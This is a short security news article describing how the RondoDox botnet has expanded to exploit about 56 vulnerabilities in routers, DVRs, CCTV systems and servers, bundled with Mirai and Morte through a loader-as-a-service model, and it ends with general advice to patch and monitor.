RondoDox Botnet

Malware campaigns leveraging the RondoDox botnet have dramatically expanded their attack surface, now targeting over 50 vulnerabilities across more than 30 vendors. Security experts describe this approach as an 'exploit shotgun', reflecting the indiscriminate targeting of a wide range of internet-exposed infrastructure. Affected systems include routers, digital video recorders (DVRs), network video recorders (NVRs), CCTV systems, web servers, and numerous other network-connected devices.

Early Intrusions and Historical Context

The first notable RondoDox activity was observed in July 2025, when researchers documented attacks on TBK DVRs and Four-Faith routers. These devices were being conscripted into a botnet designed to carry out distributed denial-of-service (DDoS) attacks across HTTP, UDP, and TCP protocols.

A specific intrusion attempt was detected on June 15, 2025, targeting TP-Link Archer routers via CVE-2023-1389, a flaw repeatedly exploited since its disclosure in late 2022. These incidents highlight the ongoing evolution of RondoDox from opportunistic single-device attacks to broader, more coordinated campaigns.

Expanded Distribution Through Loader-as-a-Service

RondoDox has recently adopted a loader-as-a-service (LaaS) model, packaging its payload alongside Mirai and Morte malware. This tactic allows attackers to distribute multiple threats simultaneously, complicating detection and remediation efforts.

Key characteristics of this expanded campaign include:

• Use of weak credentials, unsanitized inputs, and legacy CVEs to compromise devices
• Targeting of SOHO routers, IoT devices, and enterprise applications
• Multi-vector exploitation, signaling a shift from single-device opportunism to coordinated botnet deployment

Broad Exploit Arsenal

RondoDox now employs nearly 56 vulnerabilities, 18 of which remain without CVE identifiers. The exploited systems span a wide range of vendors, including:

D-Link, TVT, LILIN, Fiberhome, Linksys, BYTEVALUE, ASMAX, Brickcom, IQrouter, Ricon, Nexxt, NETGEAR, Apache, TBK, TOTOLINK, Meteobridge, Digiever, Edimax, QNAP, GNU, Dasan, Tenda, LB-LINK, AVTECH, Zyxel, Hytec Inter, Belkin, Billion, and Cisco.

This growing arsenal demonstrates the botnet’s increasing sophistication and its capacity to exploit both well-known and previously undocumented vulnerabilities.

Implications for Cybersecurity

The latest RondoDox campaigns represent a significant evolution in automated network exploitation. By combining loader-as-a-service operations with an expanded exploit set, attackers are moving beyond opportunistic attacks on single devices toward strategic, multi-vector botnet operations.

Security teams must remain vigilant, prioritizing the patching of known vulnerabilities, monitoring for suspicious network activity, and deploying proactive detection tools to mitigate the risk posed by these rapidly evolving threats.